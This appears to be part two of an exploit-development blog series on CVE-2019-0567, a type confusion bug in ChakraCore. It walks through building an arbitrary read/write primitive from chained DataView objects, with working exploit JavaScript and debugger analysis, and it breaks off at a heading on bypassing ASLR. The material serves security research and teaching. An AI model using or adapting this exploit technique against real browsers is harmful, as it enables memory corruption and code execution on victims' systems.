In part one we went over setting up a ChakraCore exploit development environment, understanding how JavaScript (more specifically, the Chakra/ChakraCore engine) manages dynamic objects in memory, and vulnerability analysis of CVE-2019-0567 - a type confusion vulnerability that affects Chakra-based Microsoft Edge and ChakraCore. In this post, part two, we will pick up where we left off and begin by taking our proof-of-concept script, which “crashes” Edge and ChakraCore as a result of the type confusion vulnerability, and convert it into a read/write primtive. This primitive will then be used to gain code execution against ChakraCore and the ChakraCore shell, ch.exe, which essentially is a command-line JavaScript shell that allows execution of JavaScript. For our purposes, we can think of ch.exe as Microsoft Edge, but without the visuals. Then, in part three, we will port our exploit to Microsoft Edge to gain full code execution.

This post will also be dealing with ASLR, DEP, and Control Flow Guard (CFG) exploit mitigations. As we will see in part three, when we port our exploit to Edge, we will also have to deal with Arbitrary Code Guard (ACG). However, this mitigation isn’t enabled within ChakraCore - so we won’t have to deal with it within this blog post.

Lastly, before beginning this portion of the blog series, much of what is used in this blog post comes from Bruno Keith’s amazing work on this subject, as well as the Perception Point blog post on the “sister” vulnerability to CVE-2019-0567. With that being said, let’s go ahead and jump right into it!

ChakraCore/Chakra Exploit Primitives

Let’s recall the memory layout, from part one, of our dynamic object after the type confusion occurs.

As we can see above, we have overwritten the auxSlots pointer with a value we control, of 0x1234. Additionally, recall from part one of this blog series when we talked about JavaScript objects. A value in JavaScript is 64-bits (technically), but only 32-bits are used to hold the actual value (in the case of 0x1234, the value is represented in memory as 001000000001234. This is a result of “NaN boxing”, where JavaScript encodes type information in the upper 17-bits of the value. We also know that anything that isn’t a static object (generally speaking) is a dynamic object. We know that dynamic objects are “the exception to the rule”, and are actually represented in memory as a pointer. We saw this in part one by dissecting how dynamic objects are laid out in memory (e.g. object points to | vtable | type | auxSlots |).

What this means for our vulnerability is that we can overwrite the auxSlots pointer currently, but we can only overwrite it with a value that is NaN-boxed, meaning we can’t hijack the object with anything particularly interesting, as we are on a 64-bit machine but we can only overwrite the auxSlots pointer with a 32-bit value in our case, when using something like 0x1234.

The above is only a half truth, as we can use some “hacks” to actually end up controlling this auxSlots pointer with something interesting, actually with a “chain” of interesting items, to force ChakraCore to do something nefarious - which will eventually lead us to code execution.

Let’s update our proof-of-concept, which we will save as exploit.js, with the following JavaScript:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);		// Instead of supplying 0x1234, we are supplying our obj
}

main();

Our exploit.js is slightly different than our original proof-of-concept. When the type confusion is exploited, we now are supplying obj instead of a value of 0x1234. In not so many words, the auxSlots pointer of our o object, previously overwritten with 0x1234 in part one, will now be overwritten with the address of our obj object. Here is where this gets interesting.

Recall that any object that isn’t NaN-boxed is considered a pointer. Since obj is a dynamic object, it is represented in memory as such:

What this means is that instead of our corrupted o object after the type confusion being laid out as such:

It will actually look like this in memory:

Our o object, who’s auxSlots pointer we can corrupt, now technically has a valid pointer in the auxSlots location within the object. However, we can clearly see that the o->auxSlots pointer isn’t pointing to an array of properties, it is actually pointing to the obj object which we created! Our exploit.js script essentially updates o->auxSlots to o->auxSlots = addressof(obj). This essentially means that o->auxSlots now contains the memory address of the obj object, instead of a valid auxSlots array address.

Recall also that we control the o properties, and can call them at any point in exploit.js via o.a, o.b, etc. For instance, if there was no type confusion vulnerability, and if we wanted to fetch the o.a property, we know this is how it would be done (considering o had been type transitioned to an auxSlots setup):

We know this to be the case, as we are well aware ChakraCore will dereference dynamic_object+0x10 to pull the auxSlots pointer. After retrieving the auxSlots pointer, ChakraCore will add the appropriate index to the auxSlots address to fetch a given property, such as o.a, which is stored at offset 0 or o.b, which is stored at offset 0x8. We saw this in part one of this blog series, and this is no different than how any other array stores and fetches an appropriate index.

What’s most interesting about all of this is that ChakraCore will still act on our o object as if the auxSlots pointer is still valid and hasn’t been corrupted. After all, this was the root cause of our vulnerability in part one. When we acted on o.a, after corrupting auxSlots to 0x1234, an access violation occurred, as 0x1234 is invalid memory.

This time, however, we have provided valid memory within o->auxSlots. So acting on o.a would actually take address is stored at auxSlots, dereference it, and then return the value stored at offset 0. Doing this currently, with our obj object being supplied as the auxSlots pointer for our corrupted o object, will actually return the vftable from our obj object. This is because the first 0x10 bytes of a dynamic object contain metadata, like vftable and type. Since ChakraCore is treating our obj as an auxSlots array, which can be indexed directly at an offset of 0, via auxSlots[0], we can actually interact with this metadata. This can be seen below.

Usually we can expect that the dereferenced contents of o+0x10, a.k.a. auxSlots, at an offset of 0, to contain the actual, raw value of o.a. After the type confusion vulnerability is used to corrupt auxSlots with a different address (the address of obj), whatever is stored at this address, at an offset of 0, is dereferenced and returned to whatever part of the JavaScript code is trying to retrieve the value of o.a. Since we have corrupted auxSlots with the address of an object, ChakraCore doesn’t know auxSlots is gone, and it will still gladly index whatever is at auxSlots[0] when the script tries to access the first property (in this case o.a), which is the vftable of our obj object. If we retrieved o.b, after our type confusion was executed, ChakraCore would fetch the type pointer.

Let’s inspect this in the debugger, to make more sense of this. Do not worry if this has yet to make sense. Recall from part one, the function chakracore!Js::DynamicTypeHandler::AdjustSlots is responsible for the type transition of our o property. Let’s set a breakpoint on our print() statement, as well as the aforementioned function so that we can examine the call stack to find the machine code (the JIT’d code) which corresponds to our opt() function. This is all information we learned in part one.

After opening ch.exe and passing in exploit.js as the argument (the script to be executed), we set a breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution and hitting the breakpoint, we then can set our intended breakpoint of chakracore!Js::DynamicTypeHandler::AdjustSlots.

When the chakracore!Js::DynamicTypeHandler::AdjustSlots is hit, we can examine the callstack (just like in part one) to identify our “JIT’d” opt() function

After retrieving the address of our opt() function, we can unassemble the code to set a breakpoint where our type confusion vulnerability reaches the apex - on the mov qword ptr [r15+10h], r11 instruction when auxSlots is overwritten.

We know that auxSlots is stored at o+0x10, so this means our o object is currently in R15. Let’s examine the object’s layout in memory, currently.

We can clearly see that this is the o object. Looking at the R11 register, which is the value that is going to corrupt auxSlots of o, we can see that it is the obj object we created earlier.

Notice what happens to the o object, as our vulnerability manifests. When o->auxSlots is corrupted, o.a now refers to the vftable property of our obj object.

Anytime we act on o.a, we will now be acting on the vftable of obj! This is great, but how can we take this further? Take not that the vftable is actually a user-mode address that resides within chakracore.dll. This means, if we were able to leak a vftable from an object, we would bypass ASLR. Let’s see how we can possibly do this.

DataView Objects

A popular object leveraged for exploitation is a DataView object. A DataView object provides users a way to read/write multiple different data types and endianness to and from a raw buffer in memory, which can be created with ArrayBuffer. This can include writing or retrieving an 8-byte, 16-byte, 32-byte, or (in some browsers) 64-bytes of raw data from said buffer. More information about DataView objects can be found here, for the more interested reader.

At a higher level a DataView object provides a set of methods that allow a developer to be very specific about the kind of data they would like to set, or retrieve, in a buffer created by ArrayBuffer. For instance, with the method getUint32(), provided by DataView, we can tell ChakraCore that we would like to retrieve the contents of the ArrayBuffer backing the DataView object as a 32-bit, unsigned data type, and even go as far as asking ChakraCore to return the value in little-endian format, and even specifying a specific offset within the buffer to read from. A list of methods provided by DataView can be found here.

The previous information provided makes a DataView object extremely attractive, from an exploitation perspective, as not only can we set and read data from a given buffer, we can specify the data type, offset, and even endianness. More on this in a bit.

Moving on, a DataView object could be instantiated as such below:

dataviewObj = new DataView(new ArrayBuffer(0x100));

This would essentially create a DataView object that is backed by a buffer, via ArrayBuffer.

This matters greatly to us because as of now if we want to overwrite auxSlots with something (referring to our vulnerability), it would either have to be a raw JavaScript value, like an integer, or the address of a dynamic object like the obj used previously. Even if we had some primitive to leak the base address of kernel32.dll, for instance, we could never actually corrupt the auxSlots pointer by directly overwriting it with the leaked address of 0x7fff5b3d0000 for instance, via our vulnerability. This is because of NaN-boxing - meaning if we try to directly overwrite the auxSlots pointer so that we can arbitrarily read or write from this address, ChakraCore would still “tag” this value, which would “mangle it” so that it no longer is represented in memory as 0x7fff5b3d0000. We can clearly see this if we first update exploit.js to the following and pause execution when auxSlots is corrupted:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x7fff5b3d0000);		// Instead of supplying 0x1234 or a fake object address, supply the base address of kernel32.dll
}

Using the same breakpoints and method for debugging, shown in the beginning of this blog, we can locate the JIT’d address of the opt() function and pause execution on the instruction responsible for overwriting auxSlots of the o object (in this case mov qword ptr [r15+10h], r13.

Notice how the value we supplied, originally 0x7fff5b3d0000 and was placed into the R13 register, has been totally mangled. This is because ChakraCore is embedding type information into the upper 17-bits of the 64-bit value (where only 32-bits technically are available to store a raw value). Obviously seeing this, we can’t directly set values for exploitation, as we need to be able to set and write 64-bit values at a time since we are exploiting a 64-bit system without having the address/value mangled. This means even if we can reliably leak data, we can’t write this leaked data to memory, as we have no way to avoid JavaScript NaN-boxing the value. This leaves us with the following choices:

  1. Write a NaN-boxed value to memory
  2. Write a dynamic object to memory (which is represented by a pointer)

If we chain together a few JavaScript objects, we can use the latter option shown above to corrupt a few things in memory with the addresses of objects to achieve a read/write primitive. Let’s start this process by examining how DataView objects behave in memory.

Let’s create a new JavaScript script named dataview.js:

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify litte-endian (true)

Notice the level of control we have in respect to the amount of data, the type of data, and the offset of the data in the buffer we can set/retrieve.

In the above code we created a DataView object, which is backed by a raw memory buffer via ArrayBuffer. With the DataView “view” of this buffer, we can tell ChakraCore to start at the beginning of the buffer, use a 32-bit, unsigned data type, and use little endian format when setting the data 0x41414141 into the buffer created by ArrayBuffer. To see this in action, let’s execute this script in WinDbg.

Next, let’s set our print() debug breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution, let’s then set a breakpoint on chakracore!Js::DataView::EntrySetUint32, which is responsible for setting a value on a DataView buffer. Please note I was able to find this function by searching the ChakraCore code base, which is open-sourced and available on GitHub, within DataView.cpp, which looked to be responsible for setting values on DataView objects.

After hitting the breakpoint on chakracore!Js::DataView::EntrySetUint32, we can look further into the disassembly to see a method provided by DataView called SetValue(). Let’s set a breakpoint here.

After hitting the breakpoint, we can view the disassembly of this function below. We can see another call to a method called SetValue(). Let’s set a breakpoint on this function (please right click and open the below image in a new tab if you have trouble viewing).

After hitting the breakpoint, we can see the source of the SetValue() method function we are currently in, outlined in red below.

Cross-referencing this with the disassembly, we noticed right before the ret from this method function we see a mov dword ptr [rax], ecx instruction. This is an assembly operation which uses a 32-bit value to act on a 64-bit value. This is likely the operation which writes our 32-bit value to the buffer of the DataView object. We can confirm this by setting a breakpoint and verifying that, in fact, this is the responsible instruction.

We can see our buffer now holds 0x41414141.

This verifies that it is possible to set an arbitrary 32-bit value without any sort of NaN-boxing, via DataView objects. Also note the address of the buffer property of the DataView object, 0x157af16b2d0. However, what about a 64-bit value? Consider the following script below, which attempts to set one 64-bit value via offsets of DataView.

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify litte-endian (true)
dataviewObj.setUint32(0x4, 0x41414141, true);	// Set, at an offset of 4 in the buffer, the value 0x41414141 and specify litte-endian (true)

Using the exact same methodology as before, we can return to our mov dword ptr [rax], rcx instruction which writes our data to a buffer to see that using DataView objects it is possible to set a value in JavaScript as a contiguous 64-bit value without NaN-boxing and without being restricted to just a JavaScript object address!

The only thing we are “limited” to is the fact we cannot set a 64-bit value in “one go”, and we must divide our writes/reads into two tries, since we can only read/write 32-bits at a time as a result of the methods provided to use by DataView. However, there is currently no way for us to abuse this functionality, as we can only perform these actions inside a buffer of a DataView object, which is not a security vulnerability. We will eventually see how we can use our type confusion vulnerability to achieve this, later in this blog post.

Lastly, we know how we can act on the DataView object, but how do we actually view the object in memory? Where does the buffer property of DataView come from, as we saw from our debugging? We can set a breakpoint on our original function, chakracore!Js::DataView::EntrySetUint32. When we hit this breakpoint, we then can set a breakpoint on the SetValue() function, at the end of the EntrySetUint32 function, which passes the pointer to the in-scope DataView object via RCX.

If we examine this value in WinDbg, we can clearly see this is our DataView object. Notice the object layout below - this is a dynamic object, but since it is a builtin JavaScript type, the layout is slightly different.

The most important thing for us to note is twofold: the vftable pointer still exists at the beginning of the object, and at offset 0x38 of the DataView object we have a pointer to the buffer. We can confirm this by setting a hardware breakpoint to pause execution anytime DataView.buffer is written to in a 4-byte (32-bit) boundary.

We now know where in a DataView object the buffer is stored, and can confirm how this buffer is written to, and in what manners can it be written to.

Let’s now chain this knowledge together with what we have previously accomplished to gain a read/write primitive.

Read/Write Primitive

Building upon our knowledge of DataView objects from the “DataView Objects” section and armed with our knowledge from the “Chakra/ChakraCore Exploit Primitives” section, where we saw how it would be possible to control the auxSlots pointer with an address of another JavaScript object we control in memory, let’s see how we can put these two together in order to achieve a read/write primitive.

Let’s recall two previous images, where we corrupted our o object’s auxSlots pointer with the address of another object, obj, in memory.

From the above images, we can see our current layout in memory, where o.a now controls the vftable of the obj object and o.b controls the type pointer of the obj object. But what if we had a property c within o (o.c)?

From the above image, we can clearly see that if there was a property c of o (o.c), it would therefore control the auxSlots pointer of the obj object, after the type confusion vulnerability. This essentially means that we can force obj to point to something else in memory. This is exactly what we would like to do in our case. We would like to do the exact same thing we did with the o object (corrupting the auxSlots pointer to point to another object in memory that we control). Here is how we would like this to look.

By setting o.c to a DataView object, we can control the entire contents of the DataView object by acting on the obj object! This is identical to the exact same scenario shown above where the auxSlots pointer was overwritten with the address of another object, but we saw we could fully control that object (vftable and all metadata) by acting on the corrupted object! This is because ChakraCore, again, still treats auxSlots as though it hasn’t been overwritten with another value. When we try to access obj.a in this case, ChakraCore fetches the auxSlots pointer stored at obj+0x10 and then tries to index that memory at an offset of 0. Since that is now another object in memory (in this case a DataView object), obj.a will still gladly fetch whatever is stored at an offset of 0, which is the vftable for our DataView object! This is also the reason we declared obj with so many values, as a DataView object has a few more hidden properties than a standard dynamic object. By decalring obj with many properties, it allows us access to all of the needed properties of the DataView object, since we aren’t stopping at dataview+0x10, like we have been with other objects since we only cared about the auxSlots pointers in those cases.

This is where things really start to pick up. We know that DataView.buffer is stored as a pointer. This can clearly be seen below by our previous investigative work on understanding DataView objects.

In the above image, we can see that DataView.buffer is stored at an offset of 0x38 within the DataView object. In the previous image, the buffer is a pointer in memory which points to the memory address 0x1a239afb2d0. This is the address of our buffer. Anytime we do dataview.setUint32() on our DataView object, this address will be updated with the contents. This can be seen below.

Knowing this, what if we were able to go from this:

To this:

What this would mean is that buffer address, previously shown above, would be corrupted with the base address of kernel32.dll. This means anytime we acted on our DataView object with a method such as setUint32() we would actually be overwriting the contents of kernel32.dll (note that there are obviously parts of a DLL that are read-only, read/write, or read/execute)! This is also known as an arbitrary write primitive! If we have the ability to leak data, we can obviously use our DataView object with the builtin methods to read and write from the corrupted buffer pointer, and we can obviously use our type confusion (as we have done by corrupted auxSlots pointers so far) to corrupt this buffer pointer with whatever memory address we want! The issue that remains, however, is the NaN-boxing dilemma.

As we can see in the above image, we can overwrite the buffer pointer of a DataView object by using the obj.h property. However, as we saw in JavaScript, if we try to set a value on an object such as obj.h = kernel32_base_address, our value will remain mangled. The only way we can get around this is through our DataView object, which can write raw 64-bit values.

The way we will actually address the above issue is to leverage two DataView objects! Here is how this will look in memory.

The above image may look confusing, so let’s break this down and also examine what we are seeing in the debugger.

This memory layout is no different than the others we have discussed. There is a type confusion vulnerability where the auxSlots pointer for our o object is actually the address of an obj object we control in memory. ChakraCore interprets this object as an auxSlots pointer, and we can use property o.c, which would be the third index into the auxSlots array had it not been corrupted. This entry in the auxSlots array is stored at auxSlots+0x10, and since auxSlots is really another object, this allows us to overwrite the auxSlots pointer of the obj object with a JavaScript object.

We overwrite the auxSlots array of the obj object we created, which has many properties. This is because obj->auxSlots was overwritten with a DataView object, which has many hidden properties, including a buffer property. Having obj declared with so many properties allows us to overwrite said hidden properties, such as the buffer pointer, which is stored at an offset of 0x38 within a DataView object. Since dataview1 is being interpreted as an auxSlots pointer, we can use obj (which previously would have been stored in this array) to have full access to overwrite any of the hidden properties of the dataview1 object. We want to set this buffer to an address we want to arbitrarily write to (like the stack for instance, to invoke a ROP chain). However, since JavaScript prevents us from setting obj.h with a raw 64-bit address, due to NaN-boxing, we have to overwrite this buffer with another JavaScript object address. Since DataView objects expose methods that can allow us to write a raw 64-bit value, we overwrite the buffer of the dataview1 object with the address of another DataView object.

Again, we opt for this method because we know obj.h is the property we could update which would overwrite dataview1->buffer. However, JavaScript won’t let us set a raw 64-bit value which we can use to read/write memory from to bypass ASLR and write to the stack and hijack control-flow. Because of this, we overwrite it with another DataView object.

Because dataview1->buffer = dataview2, we can now use the methods exposed by DataView (via our dataview1 object) to write to the dataview2 object’s buffer property with a raw 64-bit address! This is because methods like setUint32(), which we previously saw, allow us to do so! We also know that buffer is stored at an offset of 0x38 within a DataView object, so if we execute the following JavaScript, we can update dataview2->buffer to whatever raw 64-bit value we want to read/write from:

// Recall we can only set 32-bits at a time
// Start with 0x38 (dataview2->buffer and write 4 bytes
dataview1.setUint32(0x38, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

// Overwrite the next 4 bytes (0x3C offset into dataview2) to fully corrupt bytes 0x38-0x40 (the pointer for dataview2->buffer)
dataview1.setUint32(0x3C, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

Now dataview2->buffer would be overwritten with 0x4141414141414141. Let’s consider the following code now:

dataview2.setUint32(0x0, 0x42424242, true);
dataview2.setUint32(0x4, 0x42424242, true);

If we invoke setUint32() on dataview2, we do so at an offset of 0. This is because we are not attempting to corrupt any other objects, we are intending to use dataview2.setUint32() in a legitimate fashion. When dataview2->setUint32() is invoked, it will fetch the address of the buffer from dataview2 by locating dataview2+0x38, derefencing the address, and attempting to write the value 0x4242424242424242 (as seen above) into the address.

The issue is, however, is that we used a type confusion vulnerability to update dataview2->buffer to a different address (in this case an invalid address of 0x4141414141414141). This is the address dataview2 will now attempt to write to, which obviously will cause an access violation.

Let’s do a test run of an arbitrary write primitive to overwrite the first 8 bytes of the .data section of kernel32.dll (which is writable) to see this in action. To do so, let’s update our exploit.js script to the following:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    // Print debug statement
    print("DEBUG");

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

Note that in the above code, the base address of the .data section kernel32.dll can be found with the following WinDbg command: !dh kernel32. Recall also that we can only write/read in 32-bit boundaries, as DataView (in Chakra/ChakraCore) only supplies methods that work on unsigned integers as high as a 32-bit boundary. There are no direct 64-bit writes.

Our target address will be kernel32_base + 0xA4000, based on our current version of Windows 10.

Let’s now run our exploit.js script in ch.exe, by way of WinDbg.

To begin the process, let’s first set a breakpoint on our first print() debug statement via ch!WScriptJsrt::EchoCallback. When we hit this breakpoint, after resuming execution, let’s set a breakpoint on chakracore!Js::DynamicTypeHandler::AdjustSlots. We aren’t particularly interested in this function, which as we know will perform the type transition on our o object as a result of the tmp function setting its prototype, but we know that in the call stack we will see the address of the JIT’d function opt(), which performs the type confusion vulnerability.

Examining the call stack, we can clearly see our opt() function.

Let’s set a breakpoint on the instruction which will overwrite the auxSlots pointer of the o object.

We can inspect R15 and R11 to confirm that we have our o object, who’s auxSlots pointer is about to be overwritten with the obj object.

We can clearly see that the o->auxSlots pointer is updated with the address of obj.

This is exactly how we would expect our vulnerability to behave. After the opt(o, o, obj) function is called, the next step in our script is the following:

// Corrupt obj->auxSlots with the address of the first DataView object
o.c = dataview1;

We know that by setting a value on o.c we will actually end up corrupting obj->auxSlots with the address of our first DataView object. Recalling the previous image, we know that obj->auxSlots is located at 0x12b252a52b0.

Let’s set a hardware breakpoint to break whenever this address is written to at an 8-byte alignment.

Taking a look at the disassembly, it is clear to see how SetSlotUnchecked indexes the auxSlots array (or what it thinks is the auxSlots array) by computing an index into an array.

Let’s take a look at the RCX register, which should be obj->auxSlots (located at 0x12b252a52b0).

However, we can see that the value is no longer the auxSlots array, but is actually a pointer to a DataView object! This means we have successfully overwritten obj->auxSlots with the address of our dataview DataView object!

Now that our o.c = dataview1 operation has completed, we know the next instruction will be as follows:

// Corrupt dataview1->buffer with the address of the second DataView object
obj.h = dataview2;

Let’s update our script to set our print() debug statement right before the obj.h = dataview2 instruction and restart execution in WinDbg.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Print debug statement
    print("DEBUG");

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

We know from our last debugging session that the function chakracore!Js::DynamicTypeHandler::SetSlotUnchecked was responsible for updating o.c = dataview1. Let’s set another breakpoint here to view our obj.h = dataview2 line of code in action.

After hitting the breakpoint, we can examine the RCX register, which contains the in-scope dynamic object passed to the SetSlotUnchecked function. We can clearly see this is our obj object, as obj->auxSlots points to our dataview1 DataView object.

We can then set a breakpoint on our final mov qword ptr [rcx+rax*8], rdx instruction, which we previously have seen, which will perform our obj.h = dataview2 instruction.

After hitting the instruction, we can can see that our dataview1 object is about to be operated on, and we can see that the buffer of our dataview1 object currently poitns to 0x24471ebed0.

After the write operation, we can see that dataview1->buffer now points to our dataview2 object.

Again, to reiterate, we can do this type of operation because of our type confusion vulnerability, where ChakraCore doesn’t know we have corrupted obj->auxSlots with the address of another object, our dataview1 object. When we execute obj.h = dataview2, ChakraCore treats obj as still having a valid auxSlots pointer, which it doesn’t, and it will attempt to update the obj.h entry within auxSlots (which is really a DataView object). Because dataview1->buffer is stored where ChakraCore thinks obj.h is stored, we corrupt this value to the address of our second DataView object, dataview2.

Let’s now set a breakpoint, as we saw earlier in the blog post, on the setUint32() method of our DataView object, which will perform the final object corruption and, shortly, our arbitrary write. We also can entirely clear out all other breakpoints.

After hitting our breakpoint, we can then scroll through the disassembly of EntrySetUint32() and set a breakpoint on chakracore!Js::DataView::SetValue, as we have previously showcased in this blog post.

After hitting this breakpoint, we can scroll through the disassembly and set a final breakpoint on the other SetValue() method.

Within this method function, we know mov dword ptr [rax], ecx is the instruction responsible ultimately for writing to the in-scope DataView object’s buffer. Let’s clear out all breakpoints, and focus solely on this instruction.

After hitting this breakpoint, we know that RAX will contain the address we are going to write into. As we talked about in our exploitation strategy, this should be dataview2->buffer. We are going to use the setUint32() method provided by dataview1 in order to overwrite dataview2->buffer’s address with a raw 64-bit value (broken up into two write operations).

Looking in the RCX register above, we can also actually see the “lower” part of kernel32.dll’s .data section - the target address we would like to perform an arbitrary write to.

We now can step through the mov dword ptr [rax], ecx instruction and see that dataview2->buffer has been partially overwritten (the lower 4 bytes) with the lower 4 bytes of kernel32.dll’s .data section!

Perfect! We can now press g in the debugger to hit the mov dword ptr [rax], ecx instruction again. This time, the setUint32() operation should write the upper part of the kernel32.dll .data section’s address, thus completing the full pointer-sized arbitrary write primitive.

After hitting the breakpoint and stepping through the instruction, we can inspect RAX again to confirm this is dataview2 and we have fully corrupted the buffer pointer with an arbitrary address 64-bit address with no NaN-boxing effect! This is perfect, because the next time dataview2 goes to set its buffer, it will use the kernel32.dll address we provided, thinking this is its buffer! Because of this, whatever value we now supply to dataview2.setUint32() will actually overwrite kernel32.dll’s .data section! Let’s view this in action by again pressing g in the debugger to see our dataview2.setUint32() operations.

As we can see below, when we hit our breakpoint again the buffer address being used is located in kernel32.dll, and our setUint32() operation writes 0x41414141 into the .data section! We have achieved an arbitrary write!

We then press g in the debugger once more, to write the other 32-bits. This leads to a full 64-bit arbitrary write primitive!

Perfect! What this means is that we can first set dataview2->buffer, via dataview1.setUint32(), to any 64-bit address we would like to overwrite. Then we can use dataview2.setUint32() in order to overwrite the provided 64-bit address! This also bodes true anytime we would like to arbitrarily read/dereference memory!

We simply, as the write primitive, set dataview2->buffer to whatever address we would like to read from. Then, instead of using the setUint32() method to overwrite the 64-bit address, we use the getUint32() method which will instead read whatever is located in dataview2->buffer. Since dataview2->buffer contains the 64-bit address we want to read from, this method simply will read 8 bytes from here, meaning we can read/write in 8 byte boundaries!

Here is our full read/write primitive code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
	return ${x.toString(16)};
}

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // From here we can call read64() and write64()
}

main();

We can see we added a few things above. The first is our hex() function, which really is just for “pretty printing” purposes. It allows us to convert a value to hex, which is obviously how user-mode addresses are represented in Windows.

Secondly, we can see our read64() function. This is practically dentical to what we displayed with the arbitrary write primitive. We use dataview1 to corrupt the buffer of dataview2 with the address we want to read from. However, instead of using dataview2.setUint32() to overwrite our target address, we use the getUint32() method to retrieve 0x8 bytes from our target address.

Lastly, write64() is identical to what we displayed in the code before the code above, where we walked through the process of performing an arbitrary write. We have simply “templatized” the read/write process to make our exploitation much more efficient.

With a read/write primitive, the next step for us will be bypassing ASLR so we can reliably read/write data in memory.

Bypassing ASLR - Chakra/ChakraCore Edition

